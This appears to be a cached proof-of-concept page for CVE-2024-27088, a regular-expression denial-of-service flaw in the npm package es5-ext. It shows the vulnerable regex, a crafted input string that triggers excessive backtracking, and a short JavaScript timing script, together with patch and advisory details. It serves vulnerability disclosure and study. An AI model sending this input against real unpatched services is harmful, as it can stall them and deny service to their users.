Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-27088 PoC — es5-ext 安全漏洞

Source
Associated Vulnerability
Title:es5-ext 安全漏洞 (CVE-2024-27088)
Description:es5-ext是Mariusz Nowak个人开发者的一个 ECMAScript 扩展。 es5-ext v0.10.63之前版本存在安全漏洞,该漏洞源于使用具有很长名称或复杂默认参数名称的函数可能会导致脚本停止。
Description
redos
Readme
# CVE-2024-27088



## 취약점 개요

- CVE-2024-27088

- Feb 26, 2024

- ReDoS in node.js package

- rebob 프로젝트의 일환

## 취약점 설명

[github advisories](https://github.com/medikoo/es5-ext/security/advisories/GHSA-4gmj-3p3h-gm8h)

```
/^\sfunction\s([\0-')-\uffff]+)\s(([\0-(-\uffff]))\s*{/
```

This vulnerability can be exploited when there is an imbalance in parentheses, which results in excessive backtracking and subsequently increases the CPU load and processing time significantly. This vulnerability can be triggered using the following input:

`'function{' + 'n'.repeat(31) + '){'`

Here is a simple PoC code to demonstrate the issue:

```
const protocolre = /^\sfunction\s([\0-')-\uffff]+)\s(([\0-(-\uffff]))\s*{/;

const startTime = Date.now();
const maliciousInput = 'function{' + 'n'.repeat(31) + '){'

protocolre.test(maliciousInput);

const endTime = Date.now();

console.log("process time: ", endTime - startTime, "ms");
```




**Impact**

Passing functions with very long names or complex default argument names into function#copy orfunction#toStringTokens may put script to stall

**Patches**
Fixed with 3551cdd and a52e957
Published with v0.10.63

**Workarounds**
No real workaround aside of refraining from using above utilities.

[issue](https://github.com/medikoo/es5-ext/issues/201)
[target package](https://www.npmjs.com/package/es5-ext)
File Snapshot

[4.0K] /data/pocs/3c4d9de5d3acbc66fa03ef75c721e2945909b899 └── [1.4K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.